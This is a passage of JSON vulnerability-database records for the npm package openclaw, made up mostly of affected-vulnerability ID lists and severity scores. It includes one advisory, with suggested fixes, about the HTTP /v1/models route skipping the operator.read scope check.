-cxmw-p77q-wchg","reference_id":"GHSA-cxmw-p77q-wchg","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cxmw-p77q-wchg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35643","GHSA-cxmw-p77q-wchg"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nf6w-v1pc-mbe5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90846?format=json","vulnerability_id":"VCID-nfva-pukn-uqch","summary":"OpenClaw has a Gateway HTTP /v1/models Route Bypasses Operator Read Scope\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n## Summary\n\nThe OpenAI-compatible HTTP endpoint `/v1/models` accepts bearer auth but does not enforce operator method scopes.\n\nIn contrast, the WebSocket RPC path enforces `operator.read` for `models.list`.\n\nA caller connected with `operator.approvals` (no read scope) is rejected for `models.list` (`missing scope: operator.read`) but can still enumerate model metadata through HTTP `/v1/models`.\n\nConfirmed on current `main` at commit `06de515b6c42816b62ec752e1c221cab67b38501`.\n\n## Details\n\nThe WS control-plane path enforces role/scope checks centrally before dispatching methods. For non-admin operators, this includes required method scopes such as `operator.read` for `models.list`.\n\nThe HTTP compatibility path for `/v1/models` performs bearer authorization and then returns model metadata; it does not apply an equivalent scope check.\n\nAs reproduced, a caller with only `operator.approvals` can:\n\n1. connect successfully,\n2. fail `models.list` over WS with `missing scope: operator.read`,\n3. fetch `/v1/models` over HTTP with status 200 and model data.\n\nThis is a cross-surface authorization inconsistency where the stricter WS policy can be bypassed via HTTP.\n\n## Impact\n\n- Callers lacking `operator.read` can still enumerate gateway model metadata through HTTP compatibility routes.\n- Breaks scope model consistency between WS RPC and HTTP surfaces.\n- Weakens least-privilege expectations for operators granted non-read scopes.\n\n## Patch Suggestion\n\n### 1) Enforce read scope on `/v1/models` routes\n\nApply a scope gate equivalent to `models.list` before serving `/v1/models` or `/v1/models/:id`.\n\n### 2) Reuse centralized scope-authorization helper for HTTP compatibility endpoints\n\nUse the same operator scope logic used by WS dispatch (`authorizeOperatorScopesForMethod(...)`) to prevent policy drift.\n\n### 3) Add regression tests\n\nKeep this PoC and add explicit negative/positive controls:\n\n- `operator.approvals` without read is rejected on HTTP `/v1/models`.\n- `operator.read` is accepted on both WS `models.list` and HTTP `/v1/models`.\n\n## Credit\n\nReported by @zpbrent.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35619","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11019","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.10977","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11011","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35619"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/06de515b6c42816b62ec752e1c221cab67b38501","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:05:44Z/"}],"url":"https://github.com/openclaw/openclaw/commit/06de515b6c42816b62ec752e1c221cab67b38501"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-68f8-9mhj-h2mp","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:05:44Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-68f8-9mhj-h2mp"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35619","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35619"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-http-v1-models-endpoint","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:05:44Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-http-v1-models-endpoint"},{"reference_url":"https://github.com/advisories/GHSA-68f8-9mhj-h2mp","reference_id":"GHSA-68f8-9mhj-h2mp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-68f8-9mhj-h2mp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg